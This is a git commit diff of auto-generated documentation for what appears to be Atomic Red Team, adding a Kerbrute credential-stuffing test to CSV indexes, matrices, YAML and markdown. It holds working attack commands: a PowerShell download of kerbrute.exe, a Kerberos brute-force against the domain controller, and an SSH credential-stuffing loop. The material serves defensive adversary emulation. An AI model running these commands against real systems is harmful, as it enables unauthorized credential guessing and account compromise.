Generated docs from job=generate-docs branch=master [ci skip]

2022-09-01 17:40:45 +00:00
parent bece6e8835
commit e0922ea1b6
9 changed files with 112 additions and 4 deletions
@@ -1017,6 +1017,7 @@ credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Pa
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
+credential-access,T1110.004,Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
@@ -728,6 +728,7 @@ credential-access,T1552.001,Credentials In Files,11,"WinPwn - Loot local Credent
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+credential-access,T1110.004,Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
@@ -1711,6 +1711,7 @@
 - [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
+  - Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
  - Atomic Test #1: PetitPotam [windows]
@@ -1241,7 +1241,8 @@
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
  - Atomic Test #1: PetitPotam [windows]
@@ -41,7 +41,7 @@
 |  | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Process Injection](../../T1055/T1055.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [System Binary Proxy Execution](../../T1218/T1218.md) | Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  |  | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [System Binary Proxy Execution](../../T1218/T1218.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | [Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Timestomp](../../T1070.006/T1070.006.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Internal Proxy](../../T1090.001/T1090.001.md) |  |
@@ -78215,6 +78215,52 @@ credential-access:
        command: |
          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+    - name: Brute Force:Credential Stuffing using Kerbrute Tool
+      auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
+      description: 'Will read username and password combos from a file or stdin (format
+        username:password) and perform a bruteforce attack
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        domaincontroller:
+          description: Domain controller where test will be run
+          type: String
+          default: "$ENV:userdnsdomain"
+        domain:
+          description: Domain where you will be testing
+          type: String
+          default: "$ENV:userdomain"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'kerbrute.exe must exist in $env:temp
+
+          '
+        prereq_command: 'if (test-path $env:temp\kerbrute.exe){exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe"
+          -outfile "$env:temp\kerbrute.exe"
+
+          '
+      - description: 'bruteforce.txt must exist in $env:temp
+
+          '
+        prereq_command: 'if (test-path $env:temp\bruteforce.txt){exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true"
+          -outfile "$env:temp\bruteforce.txt"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "cd $env:temp\n.\\kerbrute.exe bruteforce --dc #{domaincontroller}
+          -d #{domain} $env:temp\\bruteforce.txt      \n"
  T1208:
    technique:
      x_mitre_platforms:
@@ -27,6 +27,8 @@ In addition to management services, adversaries may "target single sign-on (SSO)

 - [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos)

+- [Atomic Test #3 - Brute Force:Credential Stuffing using Kerbrute Tool](#atomic-test-3---brute-forcecredential-stuffing-using-kerbrute-tool)
+

 <br/>

@@ -120,4 +122,60 @@ brew install hudochenkov/sshpass/sshpass



+<br/>
+<br/>
+
+## Atomic Test #3 - Brute Force:Credential Stuffing using Kerbrute Tool
+Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4852c630-87a9-409b-bb5e-5dc12c9ebcde
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domaincontroller | Domain controller where test will be run | String | $ENV:userdnsdomain|
+| domain | Domain where you will be testing | String | $ENV:userdomain|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cd $env:temp
+.\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} $env:temp\bruteforce.txt
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: kerbrute.exe must exist in $env:temp
+##### Check Prereq Commands:
+```powershell
+if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+```
+##### Description: bruteforce.txt must exist in $env:temp
+##### Check Prereq Commands:
+```powershell
+if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt"
+```
+
+
+
+
 <br/>